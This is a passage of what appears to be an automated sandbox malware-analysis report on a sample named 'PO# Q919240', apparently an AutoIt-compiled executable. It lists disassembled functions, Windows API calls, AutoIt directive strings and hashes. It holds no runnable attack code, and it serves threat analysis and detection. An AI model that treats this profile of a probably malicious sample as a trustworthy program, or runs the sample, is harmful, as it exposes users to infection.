                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                Download Yara Rule
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: NameUser
                • String ID:
                • API String ID: 2645101109-0
                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                Download Yara Rule
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: N@
                • API String ID: 0-1509896676
                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                Function 004129D0 Relevance: .4, Instructions: 355COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                Function 004125E8 Relevance: .3, Instructions: 349COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                Function 00412216 Relevance: .3, Instructions: 332COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                Function 04265670 Relevance: .1, Instructions: 92COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                • Instruction ID: bacd9aa8fa942ffa6dfbac964d80f062dcaa7654f814d84d4c9ba725083bfeb3
                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                • Instruction Fuzzy Hash: DE41B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                Function 04265500 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                • Instruction ID: 9c94ef659ff168f96be4997879e6bae7858bcb5989ffc22a4f86659273b1a15d
                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                • Instruction Fuzzy Hash: 36019278A10209EFCB44DF98D5909AEF7B6FB48310F608599D81AA7701E730AE81DB80
                Function 04265560 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                • Instruction ID: 83702cf8429c48e9ea58fd0760de8d059aa53d18e161e6909e57d0cdb6406fdf
                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                • Instruction Fuzzy Hash: F9019674A11109EFCB44DF98D5949ADF7B6FB48310F608599D809A7741D730AE91DB80
                Function 04263ED0 Relevance: .0, Instructions: 6COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                Download Yara Rule
                APIs
                • DeleteObject.GDI32(?), ref: 0045953B
                • DeleteObject.GDI32(?), ref: 00459551
                • DestroyWindow.USER32(?), ref: 00459563
                • GetDesktopWindow.USER32 ref: 00459581
                • GetWindowRect.USER32(00000000), ref: 00459588
                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                • GetClientRect.USER32(00000000,?), ref: 004596F8
                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                • ShowWindow.USER32(?,00000004), ref: 00459865
                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                • GetStockObject.GDI32(00000011), ref: 004598CD
                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                • DeleteDC.GDI32(00000000), ref: 004598F8
                • _wcslen.LIBCMT ref: 00459916
                • _wcscpy.LIBCMT ref: 0045993A
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                • GetDC.USER32(00000000), ref: 004599FC
                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                • String ID: $AutoIt v3$DISPLAY$static
                • API String ID: 4040870279-2373415609
                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                Download Yara Rule
                APIs
                • GetSysColor.USER32(00000012), ref: 0044181E
                • SetTextColor.GDI32(?,?), ref: 00441826
                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                • GetSysColor.USER32(0000000F), ref: 00441849
                • SetBkColor.GDI32(?,?), ref: 00441864
                • SelectObject.GDI32(?,?), ref: 00441874
                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                • GetSysColor.USER32(00000010), ref: 004418B2
                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                • DeleteObject.GDI32(?), ref: 004418D5
                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                • FillRect.USER32(?,?,?), ref: 00441970
                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                • String ID:
                • API String ID: 69173610-0
                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                Download Yara Rule
                APIs
                • DestroyWindow.USER32(?), ref: 004590F2
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                • GetClientRect.USER32(00000000,?), ref: 0045924E
                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                • GetStockObject.GDI32(00000011), ref: 004592AC
                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                • DeleteDC.GDI32(00000000), ref: 004592D6
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                • GetStockObject.GDI32(00000011), ref: 004593D3
                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsnicmp
                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                • API String ID: 1038674560-3360698832
                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                Download Yara Rule
                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                • SetCursor.USER32(00000000), ref: 0043075B
                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                • SetCursor.USER32(00000000), ref: 00430773
                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                • SetCursor.USER32(00000000), ref: 0043078B
                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                • SetCursor.USER32(00000000), ref: 004307A3
                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                • SetCursor.USER32(00000000), ref: 004307BB
                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
